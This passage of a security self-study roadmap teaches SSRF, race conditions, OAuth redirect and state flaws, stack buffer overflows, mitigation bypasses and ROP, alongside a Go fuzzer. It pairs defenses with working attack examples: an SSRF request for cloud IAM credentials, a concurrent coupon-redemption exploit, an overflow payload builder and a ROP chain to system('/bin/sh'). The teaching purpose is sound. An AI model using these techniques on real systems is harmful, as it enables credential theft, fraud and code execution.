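def derive_key_pbkdf2(password: str, salt: bytes, iterations: int = 600_000) -> bytes:
    """Derive a 32-byte key. PBKDF2 is a stand-in here; the roadmap's choice is Argon2id."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
```

The same password with the same salt always yields the same key, which is what lets you decrypt later. The same password with a different salt yields an unrelated key, which is what stops one precomputed table from cracking every user at once.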

---

### MONTH 5–6: SECURITY BLOCK — ADVANCED VULNERABILITY CLASSES

#### SSRF — Server-Side Request Forgery: The Mechanism

**The mechanism:** An attacker causes the server to make HTTP requests to an arbitrary destination on their behalf, using the server's network identity and trust relationships.

```
Normal flow:
Browser ──▶ Server ──▶ Database/API

SSRF flow:
Browser ──▶ Server ──▶ http://169.254.169.254/   (AWS metadata endpoint)
                   ──▶ http://localhost:6379/      (Redis, internal only)
                   ──▶ http://10.0.0.5/admin       (Internal admin panel)
```

**Vulnerable code pattern:**

```python
# Application allows users to specify a URL to fetch (e.g., avatar image URL):
@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    response = requests.get(url)   # NO VALIDATION. Classic SSRF.
    return response.content
```

**Attack against AWS EC2 instance:**
```
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

The EC2 instance's IAM role credentials are returned. An attacker now has AWS API keys.

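**The defense:** Validate the URL before fetching it. Allow only `http` and `https`, resolve the hostname yourself, and reject any result in a private, loopback, or link-local range (`10.0.0.0/8`, `127.0.0.0/8`, `169.254.0.0/16`, and so on). Then connect to the IP you validated instead of re-resolving the name: an attacker who controls DNS for `evil.com` can point it at `169.254.169.254`, or answer differently on the second lookup (DNS rebinding). Disable redirect following, or re-validate every hop.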
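
A resolve-then-check validator could look like the sketch below. `ip_is_public` and `resolve_public_ips` are hypothetical helpers built on the standard library, and the policy (reject the URL if any resolved address is non-public) is an assumption. The caller must still connect to one of the returned IPs rather than the hostname, otherwise a second DNS lookup reopens the hole.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def ip_is_public(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    # Unwrap ::ffff:a.b.c.d so an IPv4-mapped address cannot dodge the check.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global

def resolve_public_ips(url: str) -> list[str]:
    """Return the IPs a URL resolves to, or raise ValueError if any is non-public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("only http(s) URLs with a host are allowed")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    infos = socket.getaddrinfo(parts.hostname, port, type=socket.SOCK_STREAM)
    ips = sorted({info[4][0] for info in infos})
    for ip in ips:
        if not ip_is_public(ip):
            raise ValueError(f"{parts.hostname} resolves to non-public address {ip}")
    return ips
```

Feed it the metadata URL from the attack above and it raises before any request is sent. A string blocklist on the URL would miss `evil.com` pointing at the same address; checking the resolved IP does not.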

**In your SecureDrop clone context:** Your file upload endpoint must not follow redirects or fetch URLs. If you add a "fetch file from URL" feature, every line of the URL handling code is a potential SSRF surface.

#### Race Conditions — The Mechanism

**The mechanism:** A system performs a check and then an action based on that check, but the state can change between the check and the action (Time-of-Check to Time-of-Use, TOCTOU).

```
Vulnerable flow:
1. Check: user has enough credits (credits = 100)
2. [100ms gap — server processes request]
3. Action: deduct credits (credits = credits - 100 = 0)

Attack (send 10 simultaneous requests):
10 threads all reach step 1 at the same time.
All 10 see credits = 100.
All 10 pass the check.
All 10 execute step 3.
Result: credits = 100 - (10 * 100) = -900. User spent 10x for the price of 1.
```
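
You can reproduce this flow on your own machine in a few lines. In the sketch below, a `threading.Barrier` plays the role of the 100ms gap: it holds every thread between the check and the action, so all ten pass the check before any of them deducts. `Account` and `run` are hypothetical names for illustration.

```python
import threading

class Account:
    def __init__(self, credits: int):
        self.credits = credits
        self._lock = threading.Lock()

    def redeem_vulnerable(self, cost: int, gap: threading.Barrier) -> bool:
        if self.credits < cost:      # 1. check
            return False
        gap.wait()                   # 2. the gap: every thread has already passed the check
        with self._lock:
            self.credits -= cost     # 3. act on a stale check
        return True

    def redeem_atomic(self, cost: int) -> bool:
        with self._lock:             # check and act under one lock
            if self.credits < cost:
                return False
            self.credits -= cost
            return True

def run(worker, n: int = 10) -> int:
    """Run n concurrent redemptions and return how many succeeded."""
    results = []
    threads = [threading.Thread(target=lambda: results.append(worker())) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)

acct = Account(100)
gap = threading.Barrier(10)
vulnerable_wins = run(lambda: acct.redeem_vulnerable(100, gap))

safe = Account(100)
atomic_wins = run(lambda: safe.redeem_atomic(100))
```

The vulnerable account ends at -900 with ten successful redemptions. The atomic one ends at 0 with exactly one. Note that locking only the deduction did not help: the bug is the distance between check and act, not the arithmetic.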

**Exploit with Go (as the attacker):**

```go
package main

import (
    "fmt"
    "net/http"
    "sync"
)

func main() {
    var wg sync.WaitGroup
    results := make(chan string, 10)
    
    // Launch 10 simultaneous requests
    for i := 0; i < 10; i++ {
        wg.Add(1)
        go func(id int) {
            defer wg.Done()
            resp, err := http.Get("http://target.com/redeem-coupon?code=SAVE100")
            if err != nil {
                results <- fmt.Sprintf("goroutine %d: error: %v", id, err)
                return
            }
            defer resp.Body.Close()
            results <- fmt.Sprintf("goroutine %d: %d", id, resp.StatusCode)
        }(i)
    }
    
    go func() {
        wg.Wait()
        close(results)
    }()
    
    for r := range results {
        fmt.Println(r)
    }
}
```

**The defense (database-level atomic operation):**

```sql
-- WRONG: check then act (two separate queries — race condition):
SELECT credits FROM accounts WHERE id = $1;  -- check
UPDATE accounts SET credits = credits - 100 WHERE id = $1;  -- act

-- CORRECT: atomic update with condition:
UPDATE accounts 
SET credits = credits - 100 
WHERE id = $1 AND credits >= 100
RETURNING credits;
-- If credits was already < 100, no row is updated. Zero race condition.
```

In your SecureDrop clone, file upload quotas, rate limiting, and any credit-based feature must use atomic database operations.
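
The application side of an atomic update is just as short: run the single statement and look at how many rows it touched. This sketch uses SQLite so it runs anywhere, which also means it cannot use `RETURNING` portably and relies on `rowcount` instead. `redeem` is a hypothetical function name.

```python
import sqlite3

def redeem(conn: sqlite3.Connection, account_id: int, cost: int) -> bool:
    """Deduct credits only if enough remain. One statement, so no check/act gap."""
    cur = conn.execute(
        "UPDATE accounts SET credits = credits - ? WHERE id = ? AND credits >= ?",
        (cost, account_id, cost),
    )
    conn.commit()
    return cur.rowcount == 1  # 0 rows touched means the condition failed

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, credits INTEGER NOT NULL)")
conn.execute("INSERT INTO accounts VALUES (1, 100)")
conn.commit()
```

The first `redeem(conn, 1, 100)` returns `True`, the second returns `False`, and the balance never goes negative. Your handler never reads the balance at all; the database makes the decision and reports it.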

#### OAuth 2.0 Flaws — The Mechanism

OAuth 2.0 is the protocol behind "Login with Google/GitHub/Facebook." Its complexity creates several common implementation vulnerabilities.

**The `state` parameter CSRF:**

```
OAuth flow:
1. User clicks "Login with GitHub"
2. Server generates random state: state = "a3f9k2"
3. Redirect to: https://github.com/login/oauth/authorize?client_id=...&state=a3f9k2
4. User authenticates with GitHub
5. GitHub redirects back: https://yourapp.com/callback?code=AUTH_CODE&state=a3f9k2
6. Server verifies state matches what it generated
7. Server exchanges code for access token

CSRF Attack (missing state validation):
1. Attacker starts the OAuth flow and authenticates with THEIR OWN GitHub account
2. Attacker intercepts the callback and does NOT let it complete, keeping the unused code
3. Attacker tricks victim into visiting: https://yourapp.com/callback?code=ATTACKER_CODE
4. Victim's browser (logged in to yourapp.com) sends the callback with attacker's code
5. Victim's account gets linked to attacker's GitHub → account takeover
```
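
Steps 2 and 6 of the legitimate flow are the entire defense, and they fit in two functions. A minimal sketch, assuming `session` is a per-browser server-side dictionary supplied by your web framework; `begin_login` and `callback_is_valid` are hypothetical names.

```python
import hmac
import secrets

def begin_login(session: dict) -> str:
    """Step 2: mint an unguessable state and bind it to this browser session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state

def callback_is_valid(session: dict, returned_state) -> bool:
    """Step 6: accept the callback only if it carries the state this session issued."""
    expected = session.pop("oauth_state", None)  # single use: a replay finds nothing
    if not expected or not returned_state:
        return False
    # Constant-time comparison; encode so non-ASCII input cannot raise TypeError.
    return hmac.compare_digest(expected.encode(), str(returned_state).encode())
```

In the CSRF attack, the victim's session never called `begin_login`, so `session.pop` finds nothing and the attacker's code is rejected before it is exchanged for a token.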

**The `redirect_uri` manipulation:**

```
Legitimate redirect:
https://yourapp.com/auth/callback

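Attacker modifies redirect_uri, for example:
https://yourapp.com.evil.com/auth/callback
https://yourapp.com/auth/callback/../../redirect?url=https://evil.com

Depending on how the OAuth server validates URIs:
- Prefix-only validation accepts yourapp.com.evil.com (the attacker's domain)
- Path-prefix validation accepts ../ traversal to an open redirect on your own site
- Wildcard subdomain rules accept any subdomain the attacker can control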
```
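
The difference between the weak and the strong check is one line. In this sketch, `REGISTERED` is a hypothetical allowlist holding the one callback URL you registered with the provider, and the two functions are illustrative names, not part of any OAuth library.

```python
REGISTERED = {"https://yourapp.com/auth/callback"}

def prefix_check(redirect_uri: str) -> bool:
    """WEAK: accepts anything that merely starts with the trusted origin."""
    return redirect_uri.startswith("https://yourapp.com")

def exact_check(redirect_uri: str) -> bool:
    """Compare the whole string against the pre-registered allowlist."""
    return redirect_uri in REGISTERED
```

`prefix_check` happily accepts `https://yourapp.com.evil.com/auth/callback`, because the attacker's hostname begins with yours. `exact_check` rejects it, along with every path-traversal and query-string variant, since none of them is the registered string.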

This entire class is testable in PortSwigger's OAuth lab series. Study each mechanism before hitting the labs.

---

# PHASE 2 → PHASE 3 CONNECTION MAP

```
AES-GCM encryption implementation (Phase 2)
    ↓
Deep understanding of how encryption parameters (IV, key, tag) are structured in memory
    ↓
Phase 3: When you reverse engineer a binary in Ghidra, you will find encryption routines.
You will recognize AES-GCM because you implemented it. You'll spot nonce reuse in 
someone else's code immediately.

Race condition understanding (Phase 2 PortSwigger)
    ↓
Visceral understanding of TOCTOU and concurrent state
    ↓
Phase 3: Heap exploitation depends on the exact ordering of allocation and free calls.
A use-after-free is a time-of-use bug: the pointer was valid when stored, not when used.
The mental model is the same.

Go concurrency (goroutines, channels) (Phase 2 backend)
    ↓
Ability to write correct concurrent code with channels
    ↓
Phase 3: Your Vigilante fuzzer uses goroutines to send thousands of concurrent 
HTTP requests. The concurrency model you built in Phase 2 is directly deployed here.

PostgreSQL B-tree + indexing (Phase 2, DDIA)
    ↓
Understanding of how databases organize data in ordered tree structures
    ↓
Phase 3: Binary exploitation often targets heap allocators (ptmalloc, tcache).
Allocators index free chunks by size in linked lists (bins, tcache) rather than trees.
Different structure, same organizing principle: the index decides what can be found fast.
```

---
---

# PHASE 3: MONTHS 7–9 — EXPLOIT ENGINEERING & RECON AUTOMATION
## *Assembly, Binary Exploitation, and Custom Tooling*

---

## THE CENTRAL THESIS OF PHASE 3

> **Software is just data. Executable data, but data.** A compiled binary is bytes in a file. When the CPU executes it, those bytes become electrical signals in silicon. An exploit is bytes that cause the CPU to execute *different* data than the programmer intended. Phase 3 teaches you to read programs at the byte level, understand how memory is corrupted, and build tools that move at machine speed.

---

### MONTH 7, WEEK 1–2: x86_64 ASSEMBLY — THE MACHINE'S LANGUAGE

**The register file — memorize this:**

```
64-bit   32-bit   16-bit   8-bit(high)  8-bit(low)   Purpose
────────────────────────────────────────────────────────────────
RAX      EAX      AX       AH           AL           Accumulator, return value
RBX      EBX      BX       BH           BL           Base, callee-saved
RCX      ECX      CX       CH           CL           Counter (loops, shifts), arg 4
RDX      EDX      DX       DH           DL           Data, I/O, arg 3
RSI      ESI      SI                    SIL          Source index (string ops), arg 2
RDI      EDI      DI                    DIL          Destination index, arg 1
RSP      ESP      SP                    SPL          Stack pointer
RBP      EBP      BP                    BPL          Base pointer (frame)
RIP      EIP      IP                                 Instruction pointer
R8–R15   R8D-R15D R8W-R15W             R8B-R15B     Additional registers
```

**The System V AMD64 calling convention (Linux x86_64) — critical for exploit development:**

```
Function arguments are passed in registers in this order:
  Argument 1: RDI
  Argument 2: RSI
  Argument 3: RDX
  Argument 4: RCX
  Argument 5: R8
  Argument 6: R9
  Arguments 7+: pushed onto the stack (right to left)

Return value: RAX (and RDX for 128-bit returns)
Caller-saved (you can trash these): RAX, RCX, RDX, RSI, RDI, R8, R9, R10, R11
Callee-saved (you must preserve): RBX, RBP, R12, R13, R14, R15
```

**Why this matters for exploitation:** When you overflow a buffer and overwrite the return address, you're redirecting execution. If you want to call `system("/bin/sh")`, you need `RDI = pointer to "/bin/sh"` before the `call system` instruction. In ROP chains, you search for gadgets that put the right value in RDI. You need to know the calling convention to construct valid ROP chains.

**Practical NASM walkthrough — write and run your first assembly program:**

```nasm
; hello.asm — print "Hello" using write() syscall
section .data
    msg db "Hello, Assembly!", 0x0a  ; string + newline
    msg_len equ $ - msg              ; length calculated at assembly time

section .text
    global _start

_start:
    ; sys_write(fd=1, buf=msg, count=msg_len)
    ; Linux syscall number for write: 1
    mov rax, 1          ; syscall number: write
    mov rdi, 1          ; arg1: file descriptor 1 (stdout)
    mov rsi, msg        ; arg2: pointer to message
    mov rdx, msg_len    ; arg3: message length
    syscall             ; invoke kernel

    ; sys_exit(code=0)
    mov rax, 60         ; syscall number: exit
    mov rdi, 0          ; arg1: exit code
    syscall
```

```bash
nasm -f elf64 hello.asm -o hello.o
ld hello.o -o hello
./hello

# Disassemble your own binary:
objdump -d -M intel hello
```

**Compare the disassembly to your source.** Every instruction is exactly where you put it. This is what Ghidra will show you for unknown binaries — except without the labels.

---

### MONTH 7, WEEK 2–4: THE STACK FRAME — THE ANATOMY OF EXPLOITATION

**A function call at the assembly level:**

```c
// C source:
int add(int a, int b) {
    int result = a + b;
    return result;
}

int main() {
    int z = add(3, 4);
    return z;
}
```

**What the CPU actually does when `add(3, 4)` is called:**

```
In main(), before call:
  1. mov edi, 3          ; arg1 (a) → RDI (32-bit: EDI)
  2. mov esi, 4          ; arg2 (b) → RSI (32-bit: ESI)
  3. call add            ; push address of the next instruction onto stack, jump to add

In add(), the prologue:
  4. push rbp            ; save caller's base pointer onto stack
  5. mov rbp, rsp        ; set new base pointer = current stack pointer

Stack now looks like:
  [RBP]     ← RSP and RBP both point here: saved RBP (caller's frame base)
  [RBP+8]   ← return address (where to go when add() returns)
  [RBP+16]  ← caller's stack frame
  
  6. sub rsp, 16         ; allocate space for local variable (result)

  7. mov [rbp-4], edi    ; store arg a into local space
  8. mov [rbp-8], esi    ; store arg b into local space
  9. mov eax, [rbp-4]
  10. add eax, [rbp-8]   ; eax = a + b
  11. mov [rbp-12], eax  ; result = eax

The epilogue:
  12. mov eax, [rbp-12]  ; return value → RAX
  13. leave              ; mov rsp, rbp; pop rbp  (restore caller's frame)
  14. ret                ; pop return address → RIP (jump back to caller)
```

**The buffer overflow — where the stack corruption happens:**

```c
// vulnerable.c
#include <string.h>

void vuln(char *input) {
    char buffer[64];           // 64 bytes allocated on stack
    strcpy(buffer, input);     // strcpy has NO bounds check
    // If input is 64 bytes or longer (strcpy also writes the trailing NUL):
    // overflows into saved RBP, then return address
}

int main(int argc, char **argv) {
    if (argc < 2) return 1;    // no argument: avoid handing NULL to strcpy
    vuln(argv[1]);
    return 0;
}
```

```
Stack layout in vuln():
  [buffer: 64 bytes]  ← RSP (grows upward toward RBP)
  [saved RBP: 8 bytes]
  [return address: 8 bytes]  ← RIP will jump here when ret executes
  [main's stack frame]
```

If you send 64 bytes to fill the buffer, then 8 more bytes to overwrite the saved RBP, then 8 bytes to overwrite the return address — the CPU will jump to whatever 64-bit address those 8 bytes represent.
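
Writing the payload as code makes the 64 + 8 + 8 layout concrete. In this sketch, `build_payload` is a hypothetical helper and `0x401136` is a made-up address; on your binary you would take a real one from `objdump` or GDB. The offsets assume the compiler placed `buffer` directly below the saved RBP, which you should confirm in the debugger.

```python
import struct

def build_payload(target_addr: int, buf_len: int = 64) -> bytes:
    """Buffer filler + saved-RBP filler + little-endian 8-byte return address."""
    return b"A" * buf_len + b"B" * 8 + struct.pack("<Q", target_addr)

payload = build_payload(0x401136)  # hypothetical address, for illustration only
```

The address is packed little-endian, so its low byte lands first in memory. The upper bytes of a typical non-PIE code address are zero, and `strcpy` stops at the first zero byte, so in practice only the low bytes are copied and the zero bytes already in the saved return address do the rest.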

**GDB session to observe the overflow:**

```bash
gcc -g -fno-stack-protector -no-pie -o vulnerable vulnerable.c
gdb ./vulnerable
(gdb) break vuln
(gdb) run $(python3 -c "print('A'*80)")
(gdb) next                 # Step over strcpy so the overflow has actually happened
(gdb) x/20gx $rsp         # See the A's (0x41) filling the buffer and beyond
(gdb) info frame           # See the corrupted saved RBP and return address
(gdb) continue             # SIGSEGV at `ret`: 0x4141414141414141 is not a canonical address
(gdb) x/gx $rsp            # The 8 bytes that `ret` tried to load into RIP
```

**The 0x4141414141414141 address is "AAAAAAAA" in ASCII hex.** You controlled the return address. This is the foundation of every binary exploit.
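
A payload of identical bytes proves you control the return address but not which 8 bytes of your input landed there. The usual trick is a pattern in which every position is distinguishable. The sketch below is a simplified version of that idea; `cyclic` and `find_offset` are hypothetical names, and dedicated exploit-development tools ship more robust equivalents.

```python
import string

def cyclic(length: int) -> bytes:
    """Pattern like Aa0Aa1Aa2... where every 3-byte chunk is distinct."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds what this pattern can cover")

def find_offset(pattern: bytes, crash_qword: int) -> int:
    """Locate the 8 bytes seen at the corrupted return address (little-endian)."""
    return pattern.find(crash_qword.to_bytes(8, "little"))
```

Run the target with `cyclic(200)` as input, read the 8 bytes at `$rsp` when it faults on `ret`, and pass that value to `find_offset`. The result is the exact number of filler bytes that precede the return address.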

---

### MONTH 8: GHIDRA — READING BINARIES YOU DIDN'T WRITE

Ghidra is a reverse engineering framework developed by the NSA and released as open source. It decompiles compiled binaries back to pseudo-C code.

**Setup:**
```bash
# Download from ghidra-sre.org
# Requires a JDK: 17 for older releases, 21 for recent ones (check the release notes)
sudo apt install openjdk-17-jdk
# Extract and run ghidraRun
```

**The Ghidra workflow for a crackme:**

A "crackme" is a small compiled binary that asks for a password. Your task: find the password without being told it.

```
Step 1: File → New Project → Import binary
Step 2: Double-click to analyze (accept defaults)
Step 3: Go to main() in the Symbol Tree
Step 4: Read the decompiled output in the Decompiler window
Step 5: Identify the comparison logic
Step 6: Find the correct input
```

**Example Ghidra decompiler output:**

```c
// What Ghidra shows you (cleaned up):
int main(void) {
    char input[64];
    printf("Enter password: ");
    fgets(input, 64, stdin);
    input[strcspn(input, "\n")] = 0;  // strip newline
    
    if (strcmp(input, "s3cr3t_p4ss") == 0) {
        puts("Access granted!");
    } else {
        puts("Wrong password.");
    }
    return 0;
}
```

The password is `s3cr3t_p4ss`. Trivial example, but the skill is in reading the decompiler output for obfuscated code.

**Real crackme techniques:**

```
Level 1: Strings analysis
  strings ./binary | grep -i pass
  → Sometimes the password is just a plaintext string in the binary

Level 2: Dynamic analysis
  ltrace ./binary < input.txt
  → ltrace shows library calls: strcmp("yourguess", "correctpass")

Level 3: Static analysis in Ghidra
  → Find the comparison function, trace back where the expected value comes from
  → Sometimes it's computed: expected = hash(username) or expected = transform(serial)

Level 4: Anti-analysis techniques
  → Binary packed with UPX (use upx -d to unpack first)
  → strcmp replaced with custom comparison loop
  → Time-based checks (debugger detection)
```
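
Level 1 is worth implementing once so that `strings` stops being magic. The sketch below approximates it: `extract_strings` is a hypothetical function that finds runs of printable ASCII, and it ignores details of the real tool such as tabs and wide-character encodings.

```python
import re

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of printable ASCII at least min_len long, roughly like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]
```

Call it on `open("./binary", "rb").read()` and filter the result for anything that looks like a prompt or a secret. When this finds nothing useful, the expected value is probably computed at runtime, and you move on to Level 2 or 3.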

---

### MONTH 8–9: MODERN BINARY SECURITY CONTROLS AND BYPASSES

On a modern Linux system, a buffer overflow rarely redirects execution by itself. The compiler and the kernel add defenses:

**1. Stack Canaries**

```
Stack layout WITH canary:
  [buffer: 64 bytes]
  [canary: 8 bytes]   ← Random value placed here at function entry
  [saved RBP: 8 bytes]
  [return address: 8 bytes]

Before returning, the compiler inserts:
  mov rax, [rbp-8]    ; load canary
  xor rax, fs:0x28    ; compare to the master copy in thread-local storage (FS segment on x86_64)
  jne __stack_chk_fail ; if different, someone overwrote it → crash
```

**Bypass:** Format string vulnerability to leak the canary value, then include it in your overflow payload.

**2. ASLR (Address Space Layout Randomization)**

```
Without ASLR:
  Stack always at:   0x7fffffffdc00
  libc always at:    0x7ffff7a00000

With ASLR (enabled by default on Linux):
  Stack this run:    0x7ffd3a2c1b40  (random)
  Stack next run:    0x7ffe51d09a30  (different random)
```

**Bypass:** Information leak vulnerability — find a way to print a pointer that reveals the current randomized base address.
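
The arithmetic behind an information leak is a single subtraction, because ASLR shifts a whole library by one random base and leaves the distances inside it unchanged. In this sketch every number is hypothetical, and `libc_base_from_leak` is an illustrative helper; real offsets come from the exact libc build on the target.

```python
PAGE = 0x1000

def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """base = runtime address of a symbol minus that symbol's offset in the file."""
    base = leaked_addr - symbol_offset
    if base % PAGE != 0:
        raise ValueError("base is not page-aligned: wrong symbol or wrong libc build")
    return base

# Hypothetical numbers for illustration only.
leaked_puts = 0x7F3A1C280E50
puts_offset = 0x80E50
base = libc_base_from_leak(leaked_puts, puts_offset)
system_addr = base + 0x50D70  # hypothetical offset of system()
```

The page-alignment check is a cheap sanity test. Library bases are always page-aligned, so a base that does not end in `000` means you leaked the wrong pointer or used offsets from the wrong libc.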

**3. NX Bit (Non-Executable Stack)**

```
Without NX: You inject shellcode into the buffer and jump to it.
With NX:    The stack is marked non-executable. If RIP points to the stack → SIGSEGV.
```

**Bypass: Return-Oriented Programming (ROP)**

```
Instead of injecting code, you chain together existing code snippets ("gadgets") 
that already exist in the binary or libc.

A gadget is a sequence of instructions ending in RET:
  pop rdi ; ret
  pop rsi ; ret
  pop rdx ; ret

ROP chain to call system("/bin/sh"):
  [address of: pop rdi; ret]    ← overwrites return address
  [address of "/bin/sh" string] ← popped into RDI (arg1)
  [address of: system()]        ← called with RDI = "/bin/sh"

Each gadget pops something useful, then RETs to the next gadget.
The stack becomes a program. Given a rich enough gadget set, ROP is Turing-complete.
```
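The chain above is just bytes in the right order. A minimal payload builder might look like the sketch below. It assumes no stack canary, so the filler is 64 bytes of buffer plus 8 bytes of saved RBP; every address is made up, and `buildChain` is a hypothetical helper.

```go
package main

import (
    "bytes"
    "encoding/binary"
    "fmt"
)

// buildChain lays out the overflow payload: filler up to the saved return
// address, then the three 8-byte words of the chain in little-endian order.
func buildChain(padLen int, popRdi, binSh, system uint64) []byte {
    var p bytes.Buffer
    p.Write(bytes.Repeat([]byte{'A'}, padLen))
    for _, word := range []uint64{popRdi, binSh, system} {
        var w [8]byte
        binary.LittleEndian.PutUint64(w[:], word)
        p.Write(w[:])
    }
    return p.Bytes()
}

func main() {
    // All addresses are invented for illustration; real ones come from
    // gadget-finder output plus a leaked libc base.
    payload := buildChain(72, 0x401263, 0x7f3c1a3d8698, 0x7f3c1a250d70)
    fmt.Printf("%d bytes total\n", len(payload))
    fmt.Printf("chain: % x\n", payload[72:])
}
```

On x86-64 glibc, `system()` can crash if the stack is not 16-byte aligned when it is called. A common fix is to place the address of a lone `ret` gadget in front of the chain, which shifts the stack by 8 bytes.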

**Tool: ROPgadget**
```bash
pip3 install ropgadget
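ROPgadget --binary ./vulnerable
# Lists every gadget it finds, with addresses
ROPgadget --binary ./vulnerable --only "pop|ret"
# Narrows the list to pop/ret gadgets, the kind the chain above needs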
```

---

### MONTH 9: THE VIGILANTE FUZZER — PHASE 3 CAPSTONE

**Architecture:**

```
vigilante/
├── cmd/
│   └── vigilante/
│       └── main.go          // CLI entry point (cobra)
├── internal/
│   ├── runner/
│   │   └── runner.go        // Orchestrates scan jobs
│   ├── scanner/
│   │   └── http.go          // Concurrent HTTP request engine
│   ├── dns/
│   │   └── resolver.go      // Concurrent DNS resolution
│   ├── wordlist/
│   │   └── parser.go        // Wordlist loading and streaming
│   ├── filter/
│   │   └── filter.go        // Response filtering (status codes, regex, size)
│   └── output/
│       └── reporter.go      // HTML/CSV report generation
├── go.mod
└── README.md
```

**The core scanner — concurrency model:**

```go
// internal/scanner/http.go
package scanner

import (
    "context"
    "fmt"
    "io"
    "net/http"
    "sync"
    "time"
)

type Result struct {
    URL        string
    StatusCode int
    BodySize   int64
    Duration   time.Duration
    Error      error
}

type Scanner struct {
    client      *http.Client
    concurrency int
}

func New(concurrency int, timeout time.Duration) *Scanner {
    return &Scanner{
        client: &http.Client{
            Timeout: timeout,
            // Don't follow redirects: we want to see the 301/302 itself
            CheckRedirect: func(req *http.Request, via []*http.Request) error {
                return http.ErrUseLastResponse
            },
        },
        concurrency: concurrency,
    }
}

// Scan takes a target URL and a channel of paths to fuzz.
// It launches [concurrency] goroutines to probe each path.
// baseURL must not end in "/" and each path must start with "/".
func (s *Scanner) Scan(ctx context.Context, baseURL string, paths <-chan string) <-chan Result {
    results := make(chan Result, s.concurrency)
    
    var wg sync.WaitGroup
    
    // Launch worker pool
    for i := 0; i < s.concurrency; i++ {
        wg.Add(1)
        go func() {
            defer wg.Done()
            for path := range paths {
                // Stop picking up new work after cancellation (Ctrl+C)
                select {
                case <-ctx.Done():
                    return
                default:
                }
                
                result := s.probe(ctx, baseURL+path)
                
                select {
                case results <- result:
                case <-ctx.Done():
                    return
                }
            }
        }()
    }
    
    // Close results when all workers are done
    go func() {
        wg.Wait()
        close(results)
    }()
    
    return results
}

func (s *Scanner) probe(ctx context.Context, url string) Result {
    start := time.Now()
    
    // Binding the request to ctx aborts in-flight requests on cancellation
    req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
    if err != nil {
        return Result{URL: url, Error: fmt.Errorf("creating request: %w", err)}
    }
    req.Header.Set("User-Agent", "Vigilante/1.0")
    
    resp, err := s.client.Do(req)
    if err != nil {
        return Result{URL: url, Duration: time.Since(start), Error: err}
    }
    defer resp.Body.Close()
    
    // resp.ContentLength is -1 when the length is unknown, so count the bytes.
    // Draining the body also lets the connection be reused (keep-alive).
    size, err := io.Copy(io.Discard, resp.Body)
    if err != nil {
        err = fmt.Errorf("reading body: %w", err)
    }
    
    return Result{
        URL:        url,
        StatusCode: resp.StatusCode,
        BodySize:   size,
        Duration:   time.Since(start),
        Error:      err,
    }
}
```
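`Scan` consumes a `<-chan string`, so something has to feed it. One possible shape for `internal/wordlist/parser.go` is sketched below as a standalone program. `StreamPaths` and `collect` are hypothetical names, and the skipping of `#` lines assumes the comment headers found at the top of wordlists such as the dirbuster lists.

```go
package main

import (
    "bufio"
    "context"
    "fmt"
    "io"
    "strings"
)

// StreamPaths reads a wordlist line by line and sends each entry on the
// returned channel, so a large list never sits in memory all at once.
// Blank lines and '#' comments are skipped; a leading '/' is added if missing.
// Scanner errors (sc.Err) are ignored here to keep the sketch short.
func StreamPaths(ctx context.Context, r io.Reader) <-chan string {
    out := make(chan string)
    go func() {
        defer close(out) // closing the channel ends the workers' range loops
        sc := bufio.NewScanner(r)
        for sc.Scan() {
            word := strings.TrimSpace(sc.Text())
            if word == "" || strings.HasPrefix(word, "#") {
                continue
            }
            if !strings.HasPrefix(word, "/") {
                word = "/" + word
            }
            select {
            case out <- word:
            case <-ctx.Done():
                return
            }
        }
    }()
    return out
}

// collect drains the stream for a wordlist given as a string.
func collect(wordlist string) []string {
    var paths []string
    for p := range StreamPaths(context.Background(), strings.NewReader(wordlist)) {
        paths = append(paths, p)
    }
    return paths
}

func main() {
    fmt.Println(collect("# common dirs\nadmin\n\n/login\nbackup.zip\n"))
}
```

The unbuffered channel gives natural backpressure: the reader only advances as fast as the workers consume, and closing it is the signal that lets every worker in the pool exit cleanly.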

**Benchmark against `ffuf`:** After building Vigilante, test it:
```bash
# Run ffuf against a target:
time ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
          -u http://target.com/FUZZ -t 50

# Run Vigilante:
time ./vigilante dir -u http://target.com -w /usr/share/wordlists/... -t 50

# Compare: requests/second, accuracy, memory usage
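# Then profile your binary for bottlenecks. cpu.prof is a hypothetical CPU profile
# that Vigilante would have to write itself (for example with runtime/pprof):
go tool pprof ./vigilante cpu.prof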
```

---

# PHASE 3 → PHASE 4 CONNECTION MAP

```
GDB stack frame analysis (Phase 3)
    ↓
Deep understanding of how the kernel manages process memory
    ↓
Phase 4: Writing a Linux Kernel Module means operating IN kernel space.
The memory model you understand from Phase 1/3 userspace applies to kernel space,
but with different consequences: a mistake doesn't crash a process, it panics the system.

ROP chain construction (Phase 3)
    ↓
Understanding of how to chain code execution through existing binary primitives
    ↓
Phase 4 Bug Bounty: Real vulnerabilities are rarely isolated. Critical severity comes from
chaining — SSRF to access internal metadata → credentials → full account takeover.
The "chain" mental model from ROP applies directly.

Vigilante Go fuzzer (Phase 3 capstone)
    ↓
Production-grade concurrent Go codebase
    ↓
Phase 4: Your recon for live bug bounty runs Vigilante. You are using your own tool
on real targets. Every bug in Vigilante costs you accuracy. Fix them before Phase 4.

Ghidra binary analysis (Phase 3)
    ↓
Ability to read compiled code without source
    ↓
Phase 4: When you find a bug in a live program, sometimes you get a crash report
and a binary. Reverse engineering tells you what the binary does without the source.
```

---
---

